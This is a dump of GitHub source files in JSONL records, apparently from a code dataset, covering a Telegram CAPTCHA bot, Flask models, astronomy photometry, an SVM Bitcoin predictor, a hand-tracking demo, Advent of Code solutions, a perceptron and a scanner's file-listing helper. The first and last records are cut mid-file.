(None, None))\n        _cch_lock.release()\n        if user_id != target:\n            await client.answer_callback_query(\n                query_id, group_config[\"msg_challenge_not_for_you\"])\n            return None\n        timeout_event.stop()\n        try:\n            await client.restrict_chat_member(\n                chat_id,\n                target,\n                permissions=ChatPermissions(can_send_other_messages=True,\n                                            can_send_messages=True,\n                                            can_send_media_messages=True,\n                                            can_add_web_page_previews=True,\n                                            can_send_polls=True))\n        except ChatAdminRequired:\n            pass\n\n        correct = \"no\" == query_data\n        if correct:\n            await client.edit_message_text(\n                chat_id,\n                msg_id,\n                group_config[\"msg_challenge_passed\"],\n                reply_markup=None)\n            _me: User = await client.get_me()\n            try:\n                await client.send_message(\n                    int(_channel),\n                    _config[\"msg_passed_answer\"].format(\n                        botid=str(_me.id),\n                        targetuser=str(target),\n                        groupid=str(chat_id),\n                        grouptitle=str(chat_title),\n                    ),\n                    parse_mode=\"Markdown\",\n                )\n            except Exception as e:\n                logging.error(str(e))\n        else:\n            await client.edit_message_text(\n                chat_id,\n                msg_id,\n                group_config[\"msg_challenge_failed\"],\n                reply_markup=None,\n            )\n            # await client.restrict_chat_member(chat_id, target)\n            _me: User = await client.get_me()\n            try:\n                await client.send_message(\n                    int(_channel),\n                    _config[\"msg_failed_answer\"].format(\n                        botid=str(_me.id),\n                        targetuser=str(target),\n                        groupid=str(chat_id),\n                        grouptitle=str(chat_title),\n                    ),\n                    parse_mode=\"Markdown\",\n                )\n            except Exception as e:\n                logging.error(str(e))\n            if group_config[\"challenge_timeout_action\"] == \"ban\":\n                await client.kick_chat_member(chat_id, user_id)\n            elif group_config[\"challenge_timeout_action\"] == \"kick\":\n                await client.kick_chat_member(chat_id, user_id)\n                await client.unban_chat_member(chat_id, user_id)\n            else:\n                pass\n            if group_config[\"delete_failed_challenge\"]:\n                Timer(\n                    client.delete_messages(chat_id, msg_id),\n                    group_config[\"delete_failed_challenge_interval\"],\n                )\n        if group_config[\"delete_passed_challenge\"]:\n            Timer(\n                client.delete_messages(chat_id, msg_id),\n                group_config[\"delete_passed_challenge_interval\"],\n            )\n\n    @app.on_message(Filters.new_chat_members)\n    async def challenge_user(client: Client, message: Message):\n        target = message.new_chat_members[0]\n        if message.from_user.id != target.id:\n            if target.is_self:\n                group_config = _config.get(str(message.chat.id), _config[\"*\"])\n                try:\n                    await client.send_message(\n                        message.chat.id, group_config[\"msg_self_introduction\"])\n                    _me: User = await client.get_me()\n                    try:\n                        await client.send_message(\n                            int(_channel),\n                            _config[\"msg_into_group\"].format(\n                                botid=str(_me.id),\n                                groupid=str(message.chat.id),\n                                grouptitle=str(message.chat.title),\n                            ),\n                            parse_mode=\"Markdown\",\n                        )\n                    except Exception as e:\n                        logging.error(str(e))\n                except ChannelPrivate:\n                    return\n            return\n        try:\n            await client.restrict_chat_member(\n                chat_id=message.chat.id,\n                user_id=target.id,\n                permissions=ChatPermissions(can_send_other_messages=False,\n                                            can_send_messages=False,\n                                            can_send_media_messages=False,\n                                            can_add_web_page_previews=False,\n                                            can_send_polls=False))\n        except ChatAdminRequired:\n            return\n        group_config = _config.get(str(message.chat.id), _config[\"*\"])\n\n        def generate_challenge_button():\n            choices = []\n            answers = []\n            answers.append(InlineKeyboardButton(\"我不是机器人\", callback_data=\"no\"))\n            answers.append(InlineKeyboardButton(\"请把我踢了吧\", callback_data=\"yes\"))\n            choices.append(answers)\n            return choices + [[\n                InlineKeyboardButton(group_config[\"msg_approve_manually\"],\n                                     callback_data=b\"+\"),\n                InlineKeyboardButton(group_config[\"msg_refuse_manually\"],\n                                     callback_data=b\"-\"),\n            ]]\n\n        timeout = group_config[\"challenge_timeout\"]\n        reply_message = await client.send_message(\n            message.chat.id,\n            group_config[\"msg_challenge\"].format(\n                target=target.first_name,\n                target_id=target.id,\n                timeout=timeout,\n                challenge=\n                \"请证明你不是一个广告机器人。\\nPlease prove yourself is not a robot.\"),\n            reply_to_message_id=message.message_id,\n            reply_markup=InlineKeyboardMarkup(generate_challenge_button()),\n        )\n        _me: User = await client.get_me()\n        chat_id = message.chat.id\n        chat_title = message.chat.title\n        target = message.from_user.id\n        timeout_event = Timer(\n            challenge_timeout(client, message.chat.id, message.from_user.id,\n                              reply_message.message_id),\n            timeout=group_config[\"challenge_timeout\"],\n        )\n        _cch_lock.acquire()\n        _current_challenges[\"{chat}|{msg}\".format(\n            chat=message.chat.id,\n            msg=reply_message.message_id)] = (message.from_user.id,\n                                              timeout_event)\n        _cch_lock.release()\n\n    async def challenge_timeout(client: Client, chat_id, from_id, reply_id):\n        global _current_challenges\n        _me: User = await client.get_me()\n        group_config = _config.get(str(chat_id), _config[\"*\"])\n\n        _cch_lock.acquire()\n        del _current_challenges[\"{chat}|{msg}\".format(chat=chat_id,\n                                                      msg=reply_id)]\n        _cch_lock.release()\n\n        # TODO try catch\n        await client.edit_message_text(\n            chat_id=chat_id,\n            message_id=reply_id,\n            text=group_config[\"msg_challenge_failed\"],\n            reply_markup=None,\n        )\n        try:\n            await client.send_message(\n                chat_id=_config[\"channel\"],\n                text=_config[\"msg_failed_timeout\"].format(\n                    botid=str(_me.id),\n                    targetuser=str(from_id),\n                    groupid=str(chat_id)))\n        except Exception as e:\n            logging.error(str(e))\n        if group_config[\"challenge_timeout_action\"] == \"ban\":\n            await client.kick_chat_member(chat_id, from_id)\n        elif group_config[\"challenge_timeout_action\"] == \"kick\":\n            await client.kick_chat_member(chat_id, from_id)\n            await client.unban_chat_member(chat_id, from_id)\n        else:\n            pass\n\n        if group_config[\"delete_failed_challenge\"]:\n            Timer(\n                client.delete_messages(chat_id, reply_id),\n                group_config[\"delete_failed_challenge_interval\"],\n            )\n\n\ndef _main():\n    global _app, _channel, _start_message, _config\n    load_config()\n    _api_id = _config[\"api_id\"]\n    _api_hash = _config[\"api_hash\"]\n    _token = _config[\"token\"]\n    _channel = _config[\"channel\"]\n    _start_message = _config[\"msg_start_message\"]\n    _proxy_ip = _config[\"proxy_addr\"].strip()\n    _proxy_port = _config[\"proxy_port\"].strip()\n    if _proxy_ip and _proxy_port:\n        _app = Client(\"bot\",\n                      bot_token=_token,\n                      api_id=_api_id,\n                      api_hash=_api_hash,\n                      proxy=dict(hostname=_proxy_ip, port=int(_proxy_port)))\n    else:\n        _app = Client(\"bot\",\n                      bot_token=_token,\n                      api_id=_api_id,\n                      api_hash=_api_hash)\n    try:\n        _update(_app)\n        _app.run()\n    except KeyboardInterrupt:\n        quit()\n    except Exception as e:\n        logging.error(e)\n    # _main()\n\n\nif __name__ == \"__main__\":\n    _main()\n","repo_name":"Tooruchan/Telegram-CAPTCHA-Lite-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15244,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"}
+{"seq_id":"29294004686","text":"from flask_restx import Namespace, reqparse, fields, inputs\n\napi = Namespace('ShipmentDetails', description='User Shipment details')\n\n# get_shipment_details_input = api.parser()\nget_shipment_details_input = reqparse.RequestParser()\nget_shipment_details_input.add_argument('TransactionId', type=str, default='string',location = 'form', required=True)\n\ncheck_status_and_insert_user_details = reqparse.RequestParser()\n# check_status_and_insert_user_details.add_argument('burning_tx_id', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('cluster', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('Name', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('Address', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('EmailId', type=str, default='string',location = 'form', required=True)\ncheck_status_and_insert_user_details.add_argument('Size', type=str, default='string',location = 'form', required=False)\ncheck_status_and_insert_user_details.add_argument('TransactionId', type=str, default='string',location = 'form', required=True)\n\ninsert_shipment_details = api.model(\n 'shipment_details', {\n 'burning_tx_id' : fields.String(attribute='burning_tx_id'),\n 'cluster' : fields.String(attribute='cluster'),\n 'first_name': fields.String(attribute='first_name'),\n 'last_name': fields.String(attribute='last_name'),\n 'Address': fields.String(attribute='Address'),\n 'ContactNumber': fields.String(attribute='ContactNumber')\n }\n)\n\nget_shipment_details_output = api.model(\n 'get_shipment_details',{\n 'ID': fields.Integer(attribute='ID'),\n 'Name': fields.String(attribute='NAME'),\n 'Address': fields.String(attribute='ADDRESS'),\n 'EmailId': fields.String(attribute='EMAIL_ID'),\n 'Size': fields.String(attribute='SIZE'),\n 'TransactionId': fields.String(attribute='TX_ID'),\n 'TimeStamp': fields.String(attribute='TIME_STAMP'),\n\n }\n)\n","repo_name":"jeetbarot1998/Factwise1-assignment","sub_path":"models/shipment_details.py","file_name":"shipment_details.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22793447657","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nh = 6.6260755e-27\nc = 2.99792458e18\nhc = h*c\n\n\nfiles = ['UVW2_2010.txt','UVM2_2010.txt','UVW1_2010.txt','U_UVOT.txt','B_UVOT.txt',\n         'V_UVOT.txt']\n\nfilter_WL = []\nfilter_A = []\n\nfor item in files:\n\n    f = open(item,'r')\n\n    filter_lambda = []\n    filter_area = []\n    for line in f:\n        line = line.rstrip()\n        column = line.split()\n        wavelen = column[0]\n        area = column[1]\n        filter_lambda.append(float(wavelen))\n        filter_area.append(float(area))\n\n    filter_lambda = np.asarray(filter_lambda,dtype=float)\n    filter_area = np.asarray(filter_area,dtype=float)\n    \n    nonzero = np.where(filter_area > 0.0)\n    \n    filter_lambda = filter_lambda[nonzero]\n    filter_area = filter_area[nonzero]\n\n    filter_WL.append(filter_lambda)\n    filter_A.append(filter_area)\n\n    f.close()\n\n\n###### VEGA for reference ######\n\n\nvega_wave,vega_area = np.loadtxt('vega.dat',dtype=float,usecols=(0,1),unpack=True)\n\n\n\n\n##########################################\n\n\nchoice = input(\"Enter SN name: \")\n\nnpz = '%s.npz' % (choice) ### VARIABLE THAT TAKES YOUR CHOICE OF SUPERNOVA AND MAKES A STRING WITH .npz OF THAT SUPERNOVA.\n\nSNname = np.load(npz) ### LOAD THE .npz FILE FROM THE DIRECTORY ITS IN.\n\nsp_flux = SNname['fluxlist'][0] ### FLUX FROM ith SPECTRUM. CHANGE INDEX TO USE DIFFERENT SPECTRUM\n\nsp_wave = SNname['wavelengthlist'][0] ### WAVELENGTHS FROM ith SPECTRUM. CHANGE INDEX TO USE DIFFERENT SPECTRUM\n\n\nfiltercurves = ['UVW2_2010','UVM2_2010','UVW1_2010','U_UVOT','B_UVOT','V_UVOT'] ### STRING LIST\n\nzeropoints = [17.38, 16.85, 17.44, 18.34, 19.11, 17.89] ### PHOTOMETRIC ZEROPOINTS BASED ON VEGA\n\n\nfiltereffwavelength=[2030,2231,2634,3501,4329,5402] ### EFFECTIVE WAVELENGTH FOR EACH FILTER (IN SAME ORDER)\n\nmag_array = np.zeros(len(filtercurves))\n\ncounts_array = np.zeros(len(filtercurves))\n\n\nfilter_array = np.array([filter_A[0],filter_A[1],filter_A[2],filter_A[3],filter_A[4],filter_A[5]])\n\nfilter_wave = np.array([filter_WL[0],filter_WL[1],filter_WL[2],filter_WL[3],filter_WL[4],filter_WL[5]])\n\n \n\nfor x in range(len(filtercurves)): \n    \n    sp_ea = np.interp(sp_wave, filter_wave[x], filter_array[x]) ### filter effective area interpolated at the spectrum wavelengths \n    \n    counts_array[x] = np.trapz(sp_ea*sp_flux*sp_wave/hc,sp_wave) ### Integrating under the curve using numpy\n    \n    mag_array[x] = -2.5*np.log10(counts_array[x])+zeropoints[x]\n    \n    \n\n'''\nNOTE on mag_array: mag_array has 6 components, one for each filter used. This means that the first\ncomponent is the calculated w2 magnitude, the second component is the m2 calculated magnitude, all\nthe way to v band calculated magnitude. The order of the magnitude reflects the order of filtercurves.\n'''\n\n","repo_name":"pbrown801/aggienova-templates","sub_path":"old/spectrophot_v2.py","file_name":"spectrophot_v2.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"71125140355","text":"from PyQt5.QtCore import pyqtSignal,QObject\r\n\r\nclass MyWorker(QObject):\r\n    complete = pyqtSignal()\r\n\r\n    def __init__(self,model):\r\n        super().__init__(parent=None)\r\n        self.file=None\r\n        self.has_header=True\r\n        self.model=model\r\n\r\n    def set_file(self,file,has_header):\r\n        self.file=file\r\n        self.has_header=has_header\r\n\r\n    def read_file(self):\r\n        self.model.loadFile(self.file,has_header=self.has_header)\r\n        print(\"Finished reading the file\")\r\n        self.complete.emit()\r\n        # self.model.notify_observers()\r\n","repo_name":"elagabalus01/myner","sub_path":"src/controllers/MyWorker.py","file_name":"MyWorker.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"45117870510","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sklearn\r\nfrom sklearn.svm import SVC\r\nfrom sklearn import svm,preprocessing\r\nimport time\r\n\r\ndata_BTC = pd.read_csv('BTC_history.csv') # Read in BTC history data for 2017/09/12-2022/09/12\r\ndata_DJI = pd.read_csv('DJI_sample.csv') # Read in DJI history data for 2017/09/12-2022/09/12\r\n\r\n'''\r\n# Plot the five-year price charts of BTC and DJI\r\nfigure1 = plt.figure()\r\n(BTCprice, DJIprice) = figure1.subplots(2, sharex=True)\r\ndata_BTC.plot(ax=BTCprice, x=\"Date\", y=\"Close\", label='BTC price')\r\ndata_DJI.plot(ax=DJIprice, x=\"Date\", y=\"Close\", label='DJI price')\r\nplt.show()\r\n\r\n# Moving averages\r\ndata_BTC['MA5'] = data_BTC['Close'].rolling(5).mean()\r\ndata_BTC['MA20'] = data_BTC['Close'].rolling(20).mean()\r\ndata_BTC['MA60'] = data_BTC['Close'].rolling(60).mean()\r\n\r\n# Exponential moving averages\r\ndata_BTC['EMA12'] = data_BTC['Close'].ewm(span=12).mean()\r\ndata_BTC['EMA26'] = data_BTC['Close'].ewm(span=26).mean()\r\n\r\n#MACD\r\ndata_BTC['DIF'] = data_BTC['EMA12'] - data_BTC['EMA26']\r\ndata_BTC['DEM'] = data_BTC['DIF'].ewm(span=9).mean()\r\ndata_BTC['OSC'] = data_BTC['DIF'] - data_BTC['DEM']\r\n\r\n# Plotting\r\nfig,ax = plt.subplots(3,1,figsize=(10,10))\r\nplt.subplots_adjust(hspace=0.8)\r\ndata_BTC['MA5'].plot(ax=ax[0])\r\ndata_BTC['MA20'].plot(ax=ax[0])\r\ndata_BTC['MA60'].plot(ax=ax[0])\r\ndata_BTC['EMA12'].plot(ax=ax[1])\r\ndata_BTC['EMA26'].plot(ax=ax[1])\r\ndata_BTC['Close'].plot(ax=ax[0])\r\ndata_BTC['Close'].plot(ax=ax[1])\r\nax[0].legend()\r\nax[1].legend()\r\ndata_BTC['DIF'].plot(ax=ax[2])\r\ndata_BTC['DEM'].plot(ax=ax[2])\r\nax[2].fill_between(data_BTC['Date'],0,data_BTC['OSC'])\r\nax[2].legend()\r\nplt.show()\r\n\r\n# Correlation coefficient\r\nBTC_series = pd.Series(data_BTC['Close'])\r\nDJI_series = pd.Series(data_DJI['Close'])\r\ncorr_BTC_DJI = round(BTC_series.corr(DJI_series), 2)\r\n\r\nprint(\"Corr of BTC&DJI:\", corr_BTC_DJI)\r\nplt.scatter(data_BTC['Close'], data_DJI['Close'])\r\nplt.title(\"Corr of BTC&DJI:\" + str(corr_BTC_DJI))\r\nplt.show()\r\n'''\r\n\r\n# SVM to predict the BTC price trend\r\ndf=data_BTC[['Close', 'Open', 'High', 'Low']]\r\n\r\n# diff is the difference between today's and the previous day's closing prices\r\ndata_BTC['diff'] = data_BTC[\"Close\"]-data_BTC[\"Close\"].shift(1)\r\ndata_BTC['diff'].fillna(0, inplace = True)\r\n\r\n# up marks whether the price rose today: 1 for a rise, 0 for a fall or no change\r\ndata_BTC['up'] = data_BTC['diff'] \r\ndata_BTC['up'][data_BTC['diff']>0] = 1\r\ndata_BTC['up'][data_BTC['diff']<=0] = 0\r\n\r\n# predictForUp holds the prediction result, likewise 1 for a rise and 0 for flat or falling, initialized to 0\r\ndata_BTC['predictForUp'] = 0 \r\n\r\n# target is the actual rise/fall outcome\r\ntarget = data_BTC['up']\r\nlength=len(data_BTC)\r\n\r\n# The training set is 80% of the original data, the test set 20%\r\ntrainNum=int(length*0.8)\r\nPredictNum=length-trainNum\r\n\r\n# Features used for training: close, open, daily high, daily low\r\nfeature=data_BTC[['Close', 'Open', 'High', 'Low']]\r\n\r\n# Standardize the features\r\nfeature=preprocessing.scale(feature)\r\nfeatureTrain=feature[1:trainNum-1]\r\ntargetTrain=target[1:trainNum-1]\r\n\r\n#kernel='linear', C=100 ->0.98 linearly separable\r\n#kernel='poly', degree=3, gamma='auto', C=50 ->0.76 polynomial transform\r\n#kernel='rbf', gamma=0.7, C=50 ->0.92 Gaussian transform\r\n#gamma = 0.5, 0.7, 1, 2 C=10^-1~10^2\r\n\r\nsvmTool = svm.SVC(kernel='linear', C=15) # Build the SVM classifier with a linear kernel, which works well when there are many features\r\nsvmTool.fit(featureTrain,targetTrain) # Train svmTool on the features and targets via fit\r\n\r\npredictedIndex=trainNum\r\n\r\n# Predict the test set one sample at a time with a while loop\r\nwhile predictedIndex7.\n'''\n\ncodes = all_codes(4)\nprint(len(codes))\n\nbest_code = ''\nbest_euler = 4\n\nfor c in codes:\n    if c.euler < best_euler:\n        best_code = c\n        best_euler = c.euler\n        print(best_code)\n\n'''\nSequence B\n\nSmallest number of vertices with signing required to be min. emb. on genus g:\n0) 0, with ('', '').\n1) 2, with ('abab', '++--')\n2) 3, with ('abacbc', '++---+')\n3) 5, with ('ababcdeced', '++--+++---')\n4) 7, with ('ababcdcdefegfg', '++--++--++---+').\n'''\n\n# Clearly, we have that sequence A is strictly greater than sequence B.\n","repo_name":"Raikhen/final-project-cs49","sub_path":"toroidal.py","file_name":"toroidal.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43579378810","text":"import cv2\nimport mediapipe as mp\n\ncap = cv2.VideoCapture(0)\nmp_Hands = mp.solutions.hands\nhands = mp_Hands.Hands(max_num_hands = 2)\nmpDraw = mp.solutions.drawing_utils\n\nfingers_coord = [(8, 6), (12, 10), (16, 14), (20, 18)]\nthumb_coord = (4, 2)\n\nwhile cap.isOpened():\n    succes, image = cap.read()\n    if not succes:\n        print('Failed to get a frame from the webcam')\n        continue\n    image = cv2.flip(image, 1)\n\n    RGB_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n    results = hands.process(RGB_image)\n    multiLandMarks = results.multi_hand_landmarks\n\n    if multiLandMarks:\n        for idx, handLms in enumerate(multiLandMarks):\n            lbl = results.multi_handedness[idx].classification[0].label\n            print(lbl)\n\n\n    cv2.imshow('web-cam', image)\n    if cv2.waitKey(1) & 0xFF == 27:\n        break\n\ncap.release()\n","repo_name":"anpilogova123/finger_counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6610924005","text":"from aoc_inputs import get_input\n\ndata = get_input()\nrps = data.split('\\n')\n\n\ndef part_1():\n # A / X = rock = 1\n # B / Y = paper = 2\n # C / Z = scissors = 3\n # ----------------\n # lose = 0\n # draw = 3\n # win = 6\n shape_pts_map = {'X': 1, 'Y': 2, 'Z': 3}\n round_pts_map = {\n 'A': {'X': 3, 'Y': 6, 'Z': 0},\n 'B': {'X': 0, 'Y': 3, 'Z': 6},\n 'C': {'X': 6, 'Y': 0, 'Z': 3}\n }\n total_points = 0\n for game in rps:\n opp, you = game.split()\n round_pts = round_pts_map[opp][you]\n shape_pts = shape_pts_map[you]\n total_points += sum((round_pts, shape_pts))\n return total_points\n\n\ndef part_2():\n # A = rock = 1\n # B = paper = 2\n # C = scissors = 3\n # ----------------\n # X = lose = 0\n # Y = draw = 3\n # Z = win = 6\n round_pts_map = {'X': 0, 'Y': 3, 'Z': 6}\n shape_pts_map = {\n 'X': {'A': 3, 'B': 1, 'C': 2}, # lose\n 'Y': {'A': 1, 'B': 2, 'C': 3}, # draw\n 'Z': {'A': 2, 'B': 3, 'C': 1}, # win\n }\n total_points = 0\n for game in rps:\n opp, outcome = game.split()\n round_pts = round_pts_map[outcome]\n shape_pts = shape_pts_map[outcome][opp]\n total_points += sum((round_pts, shape_pts))\n return total_points\n\n\nif __name__ == '__main__':\n print(part_1())\n print(part_2())\n","repo_name":"lcirvine/advent_of_code","sub_path":"2022/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9415953786","text":"from inspect import signature\n\nimport pytest\n\nimport pyroute2\nfrom pyroute2 import netlink, netns\nfrom pyroute2.netlink import exceptions, rtnl\nfrom pyroute2.netlink.rtnl import ifinfmsg, ndmsg\n\n\ndef parameters(func):\n    try:\n        return set(signature(func).parameters.keys())\n    except ValueError:\n        pytest.skip('signature check error, skip test')\n\n\ndef test_imports():\n    assert parameters(pyroute2.NetNS) > set(('netns', 'flags', 'libc'))\n    assert signature(pyroute2.IPRoute)\n    assert issubclass(netlink.NetlinkError, Exception)\n    assert issubclass(exceptions.NetlinkDumpInterrupted, Exception)\n    assert netlink.NetlinkError == exceptions.NetlinkError\n    assert netlink.nla_slot\n    assert netlink.nla_base\n    assert parameters(rtnl.rt_scope.get) == set(('key', 'default'))\n    assert isinstance(rtnl.rt_proto, dict) and 'static' in rtnl.rt_proto\n    assert parameters(netns._create) == set(('netns', 'libc', 'pid'))\n    assert parameters(netns.remove) == set(('netns', 'libc'))\n    assert parameters(netns.listnetns) == set(('nspath',))\n    assert ifinfmsg.IFF_ALLMULTI == 0x200\n    assert {state[1]: state[0] for state in ndmsg.states.items()} == {\n        0: 'none',\n        1: 'incomplete',\n        2: 'reachable',\n        4: 'stale',\n        8: 'delay',\n        16: 'probe',\n        32: 'failed',\n        64: 'noarp',\n        128: 'permanent',\n    }\n","repo_name":"svinota/pyroute2","sub_path":"tests/test_neutron/test_ip_lib.py","file_name":"test_ip_lib.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"}
+{"seq_id":"22254775027","text":"from random import seed\nfrom random import randrange\nfrom csv import reader\n \ndef cargarArchivo(filename):\n\tdataset = list()\n\twith open(filename, 'r') as file:\n\t\tcsv_reader = reader(file)\n\t\tfor celda in csv_reader:\n\t\t\tif not celda:\n\t\t\t\tcontinue\n\t\t\tdataset.append(celda)\n\treturn dataset\n\ndef convertir2Float(dataset, columna):\n\tfor celda in dataset:\n\t\tcelda[columna] = float(celda[columna].strip())\n \ndef manejoInfo(dataset, columna):\n\tclass_values = [celda[columna] for celda in dataset]\n\tunique = set(class_values)\n\tlookup = dict()\n\tfor i, value in enumerate(unique):\n\t\tlookup[value] = i\n\tfor celda in dataset:\n\t\tcelda[columna] = lookup[celda[columna]]\n\treturn lookup\n\ndef validacion(dataset, n_folds):\n\tdataset_split = list()\n\tdataset_copy = list(dataset)\n\tfold_size = int(len(dataset) / n_folds)\n\tfor i in range(n_folds):\n\t\tfold = list()\n\t\twhile len(fold) < fold_size:\n\t\t\tindex = randrange(len(dataset_copy))\n\t\t\tfold.append(dataset_copy.pop(index))\n\t\tdataset_split.append(fold)\n\treturn dataset_split\n \n\ndef porcentaje(actual, prediccioned):\n\tcorrect = 0\n\tfor i in range(len(actual)):\n\t\tif actual[i] == prediccioned[i]:\n\t\t\tcorrect += 1\n\treturn correct / float(len(actual)) * 100.0\n \ndef algoritmoEvaluacion(dataset, algorithm, n_folds, *args):\n\tfolds = validacion(dataset, n_folds)\n\tscores = list()\n\tfor fold in folds:\n\t\ttrain_set = list(folds)\n\t\ttrain_set.remove(fold)\n\t\ttrain_set = sum(train_set, [])\n\t\ttest_set = list()\n\t\tfor celda in fold:\n\t\t\tcelda_copy = list(celda)\n\t\t\ttest_set.append(celda_copy)\n\t\t\tcelda_copy[-1] = None\n\t\tprediccioned = algorithm(train_set, test_set, *args)\n\t\tactual = [celda[-1] for celda in fold]\n\t\taccuracy = porcentaje(actual, prediccioned)\n\t\tscores.append(accuracy)\n\treturn scores\n \ndef prediccion(celda, weights):\n\tactivation = weights[0]\n\tfor i in range(len(celda)-1):\n\t\tactivation += weights[i + 1] * celda[i]\n\treturn 1.0 if activation >= 0.0 else 0.0\n \ndef entrenamientoPesos(train, l_rate, n_repeticion):\n\tweights = [0.0 for i in range(len(train[0]))]\n\tfor repeticion in range(n_repeticion):\n\t\tfor celda in train:\n\t\t\tprediccionion = prediccion(celda, weights)\n\t\t\terror = celda[-1] - prediccionion\n\t\t\tweights[0] = weights[0] + l_rate * error\n\t\t\tfor i in range(len(celda)-1):\n\t\t\t\tweights[i + 1] = weights[i + 1] + l_rate * error * celda[i]\n\treturn weights\n \ndef perceptron(train, test, l_rate, n_repeticion):\n\tprediccionions = list()\n\tweights = entrenamientoPesos(train, l_rate, n_repeticion)\n\tfor celda in test:\n\t\tprediccionion = prediccion(celda, weights)\n\t\tprediccionions.append(prediccionion)\n\treturn(prediccionions)\n \nseed(1)\n\nfilename = 'Iris.csv'\ndataset = cargarArchivo(filename)\nfor i in range(len(dataset[0])-1):\n\tconvertir2Float(dataset, i)\n\nmanejoInfo(dataset, len(dataset[0])-1)\n\nn_folds = 3\nl_rate = 0.01\nn_repeticion = 500\nscores = algoritmoEvaluacion(dataset, perceptron, n_folds, l_rate, n_repeticion)\nprint('Learning per column: %s' % scores)\nprint('Learning percentage: %.3f%%' % (sum(scores)/float(len(scores))))\n","repo_name":"dnegu/TopIA","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37877006642","text":"import subprocess, os\nfrom checks import check_path, check_path_directory\n\n\n\n# Get the list of newly created files in the last m minutes \tO(N)\ndef Get_new_files_created_or_modified_in_minutes(directory, m):\n\tcmd = \"find \" + directory + \" -type f -cmin -\" + m\n\tfiles = subprocess.check_output(cmd, shell=True)\n\tfiles = files.decode(\"UTF-8\")\n\tfiles = files.split(\"\\n\")\t# O(N)\n\tfile_list = []\n\tfor file in files:\t\t\t# O(N)\n\t\tif not(file == \"\"):\n\t\t\tfile_list.append(file)\n\treturn file_list\n\n#-------------------------------------------------------------------------------------------------\n\n# List all files in a directory recursively \t\t# O(N)\ndef list_files_in_directory(directory):\n\tif(check_path_directory(directory)):\n\t\tfiles = []\n\t\tentries_in_directory = os.listdir(directory)\n\t\tfor entry in entries_in_directory:\n\t\t\tentry_full_Path = os.path.join(directory, entry)\n\t\t\tif check_path_directory(entry_full_Path):\n\t\t\t\tfiles = files + list_files_in_directory(entry_full_Path)\n\t\t\telse:\n\t\t\t\tif(check_path(entry_full_Path)):\n\t\t\t\t\tfiles.append(entry_full_Path)\n\t\treturn files\n","repo_name":"Abdelrhman-CaT/Simple-Anti-Malware-Signature-Based-Detection","sub_path":"scanner/file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2632613196","text":"from dataclasses import dataclass\nimport fileinput\nimport re\n\n\n@dataclass\nclass Ingredient():\n\tname: str\n\tcapacity: int\n\tdurability: int\n\tflavor: int\n\ttexture: int\n\tcalories: int\n\n\tdef __post_init__(self):\n\t\tif not isinstance(self.capacity, int):\n\t\t\tself.capacity = int(self.capacity)\n\t\tif not isinstance(self.durability, int):\n\t\t\tself.durability = int(self.durability)\n\t\tif not isinstance(self.flavor, int):\n\t\t\tself.flavor = int(self.flavor)\n\t\tif not isinstance(self.texture, int):\n\t\t\tself.texture = int(self.texture)\n\t\tif not isinstance(self.calories, int):\n\t\t\tself.calories = int(self.calories)\n\n\ndef parse_ingredients(lines):\n\tpattern = re.compile(r'(?P[A-Za-z]+): capacity (?P-?[0-9]+), durability (?P-?[0-9]+), flavor (?P-?[0-9]+), texture (?P-?[0-9]+), calories (?P-?[0-9]+)')\n\tingredients = []\n\n\tfor line in lines:\n\t\tmatch = pattern.match(line)\n\n\t\tif match is None:\n\t\t\traise ValueError(\"Invalid line %s\", line)\n\t\telse:\n\t\t\tingredients.append(Ingredient(**match.groupdict()))\n\n\treturn ingredients\n\n\ndef calc_score(ingredients: list[Ingredient], quanities):\n\tcapacity = sum(quanity * ingredient.capacity for ingredient, quanity in zip(ingredients, quanities))\n\tdurability = sum(quanity * ingredient.durability for ingredient, quanity in zip(ingredients, quanities))\n\tflavor = sum(quanity * ingredient.flavor for ingredient, quanity in zip(ingredients, quanities))\n\ttexture = sum(quanity * ingredient.texture for ingredient, quanity in zip(ingredients, quanities))\n\tcalories = sum(quanity * ingredient.calories for ingredient, quanity in zip(ingredients, quanities))\n\n\tif any(value < 0 for value in (capacity, durability, flavor, texture)):\n\t\treturn 0, calories\n\n\treturn capacity * durability * flavor * texture, calories\n\ndef part1(lines):\n\tingredients = parse_ingredients(lines)\n\n\tmax_score = 0\n\n\tfor first_quantity in range(101):\n\t\tfor second_quanitity in range(100 - first_quantity):\n\t\t\tfor third_quantity in range(100 - (first_quantity + second_quanitity)):\n\t\t\t\tfourth_quantity = 100 - (first_quantity + second_quanitity + third_quantity)\n\n\t\t\t\tquantities = [first_quantity, second_quanitity, third_quantity, 